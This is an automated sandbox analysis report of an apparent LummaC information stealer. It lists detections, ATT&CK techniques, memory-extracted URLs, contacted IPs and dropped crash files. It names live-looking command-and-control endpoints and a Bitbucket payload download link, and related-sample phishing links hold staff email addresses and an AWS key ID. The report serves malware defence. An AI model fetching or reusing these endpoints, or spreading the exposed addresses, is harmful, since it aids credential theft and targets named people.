                Source: Yara match File source: 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 2 Process Injection | 34 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Process Injection | LSASS Memory | 751 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 34 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                Source | Detection | Scanner | Label | Link
                jSFUzuYPG9.exe | 63% | ReversingLabs | Win32.Infostealer.Tinba |
                jSFUzuYPG9.exe | 51% | Virustotal | | Browse
                jSFUzuYPG9.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                jSFUzuYPG9.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steam.tv/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://energyaffai.lat:443/api=jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netjSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exejSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enjSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l==jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://lev-tolstoi.com/jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449631848.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://store.steampowered.com/privacy_agreement/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com:443/profiles/76561199724331900jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://store.steampowered.com/points/shop/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://ocsp.rootca1.amazontrust.com0:jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorjSFUzuYPG9.exe, 00000000.00000002.1979443513.00000000064D9000.00000002.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1649934312.0000000005EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&ajSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://sketchfab.comjSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.ecosia.org/newtab/jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://lv.queniujq.cnjSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://grannyejh.lat:443/api$jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brjSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.youtube.com/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/privacy_agreement/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netjSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://cdn.cookielaw.org/jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.google.com/recaptcha/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://checkout.steampowered.com/jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://sweepyribs.lat:443/apijSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgjSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/;PerjSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://store.steampowered.com/;jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://store.steampowered.com/about/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://steamcommunity.com/my/wishlist/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://sustainskelet.lat:443/apisjSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://help.steampowered.com/en/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://steamcommunity.com/market/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://store.steampowered.com/news/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYijSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=ejSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascriptjSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://bitbucket.org/fjSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
52.216.152.124 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579761
Start date and time: 2024-12-23 08:39:37 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: jSFUzuYPG9.exe
renamed because original name is a hash value
Original Sample Name: 820f418e980b172684fe96e4aa6e50a5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@13/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.246.63, 4.245.163.56, 20.190.147.4
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target jSFUzuYPG9.exe, PID 7428 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:40:34 | API Interceptor | 46x Sleep call for process: jSFUzuYPG9.exe modified
02:41:40 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                                                        • 52.217.67.100
                                                                                                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.18.140
                                                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.203.57
                                                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 16.182.37.145
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.216.41.233
                                                                                                                                                                                                                                                                        https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                                                                                                                        • 52.217.128.241
                                                                                                                                                                                                                                                                        https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                                                                                                                        • 52.216.142.68
                                                                                                                                                                                                                                                                        steamcommunity.comHK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                                                                                                        0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.36.201
                                                                                                                                                                                                                                                                        0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 172.67.199.72
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0441240916950452
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:LMFMTroqFe6asHhroI7JfYQXIDcQvc6QcEVcw3cE/3+HbHg/8BRTf3Oy1oVazW0B:YaTr1a20BU/QjudxWfzuiFlZ24IO8Y
                                                                                                                                                                                                                                                                        MD5:FF72212B19E055C0BD50077361089F14
                                                                                                                                                                                                                                                                        SHA1:1D200A52C547518FC6950A54B158A96D36A8D60C
                                                                                                                                                                                                                                                                        SHA-256:E2530A89CC5A8D8913FCCCC6E81F0743AF9383545E1A6CCF15A33EB550C158B3
                                                                                                                                                                                                                                                                        SHA-512:E9994CAD69257068BF723C52FED5B2E6680D7DA694A655ADE2929BA1940F51150C02DB54B579A2A5337D3B72E40390452C582F67550DD551A9010F7080F4C695
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:low
Preview:Version=1 EventType=APPCRASH EventTime=133794132685071547 ReportType=2 Consent=1 UploadTime=133794132690539197 ReportStatus=524384 ReportIdentifier=40004372-aeb3-4959-98da-6976da283c96 IntegratorReportIdentifier=c55a5d83-6ad4-43d0-a0d1-c47e480dfee3 Wow64Host=34404 Wow64Guest=332 NsAppName=jSFUzuYPG9.exe AppSessionGuid=00001d04-0001-0013-7528-7cf20d55db01 TargetAppId=W:000644498d71dd5b482e9da09b5a5d5870910000ffff!0000a5498979325229c5494a01fddd7e8013750a5ce7!jSFUzuYPG9.exe TargetApp
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 07:41:08 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):296778
                                                                                                                                                                                                                                                                        Entropy (8bit):1.5044953878543896
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:F9NFyjLBB1fyWyS6y0HKeUdgIXAbEH7ITJtfqaYu:/yp+y06jbILbYu
                                                                                                                                                                                                                                                                        MD5:BA4DD9D6BA6E729046B2797D183C99CF
                                                                                                                                                                                                                                                                        SHA1:F1F23D5927D676C24C265095D7961144ACDAD025
                                                                                                                                                                                                                                                                        SHA-256:5F3AA81942B8F43B22C4E47C1120FD4B8417A7902D9207735AD7EBEDB5168A4E
                                                                                                                                                                                                                                                                        SHA-512:EBCC286B64690DD0E2D1261BB6886E93D6FE228239874A746A816C5B389639C2BA76C390758FD99D8DDD6A2CB5384669474141E73DCACFE8D024AE975A1D04D5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8382
                                                                                                                                                                                                                                                                        Entropy (8bit):3.7109805799363778
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJS86L6YeISU9HGgmfCZZprP89b22sflZym:R6lXJR6L6YRSU9mgmfqU2VflN
                                                                                                                                                                                                                                                                        MD5:F9F6914B867697FCC3B80EAC9E29F571
                                                                                                                                                                                                                                                                        SHA1:EEFAB1DA695C4F20AEF6B95DA54F1AF0C543D04B
                                                                                                                                                                                                                                                                        SHA-256:FB331F6B4FCF7CF6DAAF1DCFAA2501BBB363755CF6B3378A32170F59C5C763EA
                                                                                                                                                                                                                                                                        SHA-512:8DBB09565B5D1B33F0595EBC9C7389DD3E64DDB953A38DA4129716B4A3B2819E717D5CB27DF7050793041ABBA1D5F94F81C9539A0B3588F226BCBF0BB16F7B68
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7428</Pi
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4624
                                                                                                                                                                                                                                                                        Entropy (8bit):4.524479517481027
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsnYJg77aI9IjWpW8VY/WYm8M4JataKVFLuu+q8h86ZXax4UztDU5d:uIjfneI7yS7VeJOuuSXaxnzS5d
                                                                                                                                                                                                                                                                        MD5:F294DEA59C7F4333693724F36689A9A0
                                                                                                                                                                                                                                                                        SHA1:16C64CDF8559CD94E7395B7A1464D16BDD332112
                                                                                                                                                                                                                                                                        SHA-256:E5C8783F5D67B8D34148CB351B7BA04D971AA1B21F09F1E366CEE3965D9EE923
                                                                                                                                                                                                                                                                        SHA-512:FB4CFD7E6CAE933B36E14DF676F85BAA797DA9339D5AA1C09FBBCBED05214ACD2C85A657DACC3833F2EAEB9BE7C01947980A26A56354DFA9FE1D2E8DF8C85701
                                                                                                                                                                                                                                                                        Malicious:false
